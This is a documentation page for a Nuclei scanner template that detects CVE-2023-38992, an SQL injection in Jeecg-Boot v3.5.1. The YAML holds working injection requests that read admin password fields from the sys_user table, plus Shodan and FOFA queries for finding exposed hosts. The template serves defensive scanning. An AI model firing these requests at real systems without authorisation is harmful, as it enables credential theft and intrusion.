Skip to content
Nuclei Templates

Jeecg-Boot v3.5.1 - SQL Injection

ID: CVE-2023-38992

Severity: critical

Author: ritikchaddha

Tags: cve,cve2023,jeecg,jeecg-boot,sqli

Description

Section titled “Description”

SQL injection vulnerability via the title parameter at /sys/dict/loadTreeData in jeecg-boot v3.5.1.

YAML Source

Section titled “YAML Source”
id: CVE-2023-38992


info:
  name: Jeecg-Boot v3.5.1 - SQL Injection
  author: ritikchaddha
  severity: critical
  description: |
    SQL injection vulnerability via the title parameter at /sys/dict/loadTreeData in jeecg-boot v3.5.1.
  impact: |
    Successful exploitation could lead to unauthorized access to sensitive data.
  remediation: |
    Implement input validation and use parameterized queries to prevent SQL Injection attacks.
  reference:
    - https://github.com/jeecgboot/jeecg-boot/issues/5173
    - https://my.oschina.net/jeecg/blog/10107636
    - https://nvd.nist.gov/vuln/detail/CVE-2023-38992
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-38992
    cwe-id: CWE-89
    epss-score: 0.00076
    epss-percentile: 0.31944
    cpe: cpe:2.3:a:jeecg:jeecg_boot:3.5.1:*:*:*:*:*:*:*
  metadata:
    max-request: 4
    verified: true
    shodan-query: http.favicon.hash:1380908726
    fofa-query: icon_hash=1380908726
  tags: cve,cve2023,jeecg,jeecg-boot,sqli


http:
  - method: GET
    path:
      - "{{BaseURL}}/{{path}}sys/dict/loadTreeData?tableName=sys_user&text=password%20text,id&code=password&hasChildField=&converIsLeafVal=1&condition=&pid=admin&pidField=username"
      - "{{BaseURL}}/{{path}}sys/dict/loadTreeData?tableName=sys_user+t&text=password,id&code=password&hasChildField=&converIsLeafVal=1&condition=&pid=admin&pidField=username"


    payloads:
      path:
        -
        - jeecg-boot/


    stop-at-first-match: true
    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body, "parentId\":", "key\":", "{\"title", "success\":true")'
          - 'contains(header, "application/json")'
          - "status_code == 200"
        condition: and
# digest: 4a0a0047304502201bb742846a74d635fd4e71b982ab600148e562b7d19f28a68787dbc5dc19d469022100d8e410b2d871fb32d80d869ea0bb2cc5169a506f39b56270f76df9925fd9759c:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-38992.yaml"

View on Github